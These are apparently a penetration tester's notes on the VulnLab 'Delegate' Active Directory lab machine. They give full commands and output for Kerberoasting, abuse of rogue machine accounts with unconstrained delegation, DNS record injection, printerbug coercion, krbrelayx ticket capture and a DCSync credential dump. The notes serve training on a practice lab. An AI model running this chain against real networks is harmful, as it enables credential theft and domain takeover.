Delegate

This is not a writeup, just my notes about VulnLabs machines.

Operating System:

Chain: False

Credentials

Username

Password

Method

Scope

A.Briggs

P4ssw0rd1#123

Found in file

Domain User

N.Thompson

KALEB_2341

GenericWrite + Append fake SPN

Domain User

✅ Valid Usernames

Administrator@delegate.vl
R.Cooper@delegate.vl
J.Roberts@delegate.vl
Guest@delegate.vl
N.Thompson@delegate.vl
A.Briggs@delegate.vl
DC1$@delegate.vl

🔑 Passwords list

P4ssw0rd1#123
KALEB_2341

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Mon Apr  7 20:52:22 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_delegate_tcp_allports -vvv 10.10.77.192
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-08 00:59:02Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49683/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56221/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56250/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service Enumeration

DNS

Not Vulnerable to DNS Zone Transfer

SMB

Domain SID: S-1-5-21-1484473093-3449528695-2030935120

Server allows null session authentication
Server allows guest session authentication
- RID-Enumeration returned a list of valid usernames
- IPC$, NETLOGON and SYSVOL possesses Write permissions

Finding a password in file SYSVOL

File: /SYSVOL/delegate.vl/scripts/users.bat
-----------------------------------------------------------------------------------------
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

❯ nxc smb 10.10.77.192 -u users.txt -p 'P4ssw0rd1#123' --continue-on-success
SMB         10.10.77.192    445    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123

Not kerberoastable users
Not asreproastable users

Bloodhound enumeration

❯ bloodhound-python -c all --zip -ns 10.10.77.192 -u A.Briggs -p 'P4ssw0rd1#123' -d delegate.vl
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 32S
INFO: Compressing output into 20250407212413_bloodhound.zip

Exploitation

Abusing DACL to compromise user

Assigning fake SPN to make the user kerberoastable

❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4568b4ebc9930ccc1f48ea83c45b0727$2131c12dcdfe15c1054bbbe66f5ad4168fa021765b723baf34fba30b9c5f04180ea273a924faa4111251f8e41c430c6707109626626166b96666699623935bb0d10cd5a441440f9698371a9d7ad75aad18105f6e7b09fa448d164428c2689cc34dcc87c2f1f390fcc73b41e002d172c4f989c22ee6d8f9fa322fa0b0c23cd3fcf6652ba1b1e90d859071c4c8c7aa67556cc41fc74656397c42d3399ac9d6fb7512625a4f9e3cf6316c84682b473473bf84212040f4a7b3da58294d496f8641378f466719d3da2a1ffa972abab521bcbe10cca70dd1fa0a883d16c4ebda634c4f86fdce3f33a399adc062a70b17e77615a1941fd6f453f52f1f35586d7a998a9e8195a41df449294d4ad3e58dbc4220cab98a90481e3bbc615276dc1638a42dfeb68a11a3a82c32eaee70ac2ee8464a5c19ed19b8709e20cee499a9399e96cc3676155b1b13bb6ebe1100a6986c6392c1ea8fc263b7f605e475ae30ea11f2daa5754e385fd88cda55aa06f3de5910ea97e8feafbbe45dc3cca224eac35efe3d1816e4647ae8e712525943e9347aec90b9204820c15b07fe02b53ddd2ecbf4bf3742b5473ff7f941aa8056bd9d5bf85887fa2bc584405d4b0740b6b684f57cfb72d430d21f67c829cf09a48121ddaead2908b2064f7c90f66b714740644c672e0a07027cd2dc96e18aa431c28f73c78cd219c7fb32cfd458f1ce4faee5c402ee89f438c6637fc40d6ef6eb4fc641323ae266fff6ff514edcfb2c569fe3958ef5929d5e9424671f4be65a72ab976850d1b3b92a3ceffe67d4f136dcad09af6359e9365afbcb390efa88cf63cf5a57d4afb4c2e3591d54902307bb0cfba069645220adca76e87432b4c8e3179269a96865e17aca0d66e97ad147f625bab4c64af8958f5bc14c232bb530a392d07e2bb0b070a5bd0ea3f8e749925e8a75b3267f797f7e7e0d35ee8c9365e4ab8eb1239a148e3eaf00ff4138f94c57ae531adec0ac132eb0bcc9480a3ead5e85d5169a5d4f6659eee2b59a4904ff3d4735b84e84e5dc1e41c4b1421cc92eeb56573d3196f07e6484f839abe7a5783e573fce7ced22ed07af9254d3787569be258f3037ce8edf02f54d9150ff5c5793dd2b7f6b5310fbf965d54a0ac391b910b3c0879d17b28ab02fb54579f3ad5af4bbbbdb841ec2cff915d03ef8dee229b0587a39bf55d0d0a37f8aafa758da6eb070c8c7f6f007bcc41b38fc45a709987f3375f5090cab451a4bf5dd0d3ba61435184f1b20fea24bf954fe5bf1caea16448c95b20abc2a6ba08c75f1cf0ce235c74c82bd1b5ca24450d8194b94dddb252459c53d545a537c2bac495eddce03d0c3f3e5eb66d46ac6944803179bd4b4cfb22bd1e7adfcbbd39d7ace43ace09dae64e1ca186d923d180e1aac22995a8c7d985c3bf3121053271899a151d6834af1b25d2a444bf37bf90b881dc6

❯ hashcat -m 13100 n.thompson.kerberoast /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4568b4ebc99<SNIF>:KALEB_2341

Domain Compromise

Situational Awareness

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /all

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
DELEGATE\delegation admins                  Group            S-1-5-21-1484473093-3449528695-2030935120-1121 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======                                Enabled
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled

Windows

Adding Computer to the domain controller

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account EVIL added

Enabling unconstrained delegation

Property flag

Value in decimal

Why?

WORKSTATION_TRUST_ACCOUNT

4096

Indicate is a machine account (mandatory)

TRUSTED_FOR_DELEGATION

524288

Enable Unconstrained Delegation

Total: 524288 + 4096 = 528384

#Enable unconstrained delegation by setting the userAccountControl attribute to 528384
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute useraccountcontrol -Value 528384
[+] Machine account evil attribute useraccountcontrol updated

Adding a malicious HTTP SPN

Note: make computer look like a real service by adding SPN HTTP/EVIL.delegate.vl

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Value HTTP/EVIL.delegate.vl -Append
[+] Machine account evil attribute ServicePrincipalName appended

Checking the configuration applied

*Evil-WinRM* PS C:\Users\N.Thompson\Documents>  Get-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=evil,CN=Computers,DC=delegate,DC=vl
HTTP/EVIL.delegate.vl
RestrictedKrbHost/EVIL
HOST/EVIL
RestrictedKrbHost/EVIL.delegate.vl
HOST/EVIL.delegate.vl

Adding a malicious DNS

❯ python3 dnstool.py -u 'delegate.vl\evil$' -p 'Password123' -r evil.delegate.vl -d 10.8.5.48 -a add dc1.delegate.vl -dns-ip 10.10.111.117
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Take time to replicate you can use nslookup evil.delegate.vl dc1.delegate.vl to sure is replicated into AD.

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71

Use: pypykatz crypto nt 'Password123'

Coercing the authentication to malicious dns

❯ python3 printerbug.py delegate.vl/'EVIL$:Password123'@10.10.111.117 evil.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.111.117
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Capturing the NT Hash via unconstrated delegation

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.111.117
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack against domain controller.

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
<SNIF>

Linux

Creating a machine account

❯ impacket-addcomputer  delegate.vl/N.Thompson:KALEB_2341 -computer-name z3r0 -computer-pass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account z3r0$ with password Password123.

Adding the UserControlAccount attributes

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f WORKSTATION_TRUST_ACCOUNT
[-] ['WORKSTATION_TRUST_ACCOUNT'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'useraccountcontrol'

Adding HTTP/CIFS SPN's to rogue computer

❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'CIFS/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl

Checking the ServicePrincipalName

bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'serviceprincipalname'

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80

Coercing the authentication to malicious dns

❯ python3 printerbug.py 'delegate.vl/z3r0$:Password123'@10.10.79.76 z3r0.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.79.76
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Output from krbrelayx and printerbugshe;

[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.79.76
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up...

PreviousSweep NextRedelegate

Last updated 15 days ago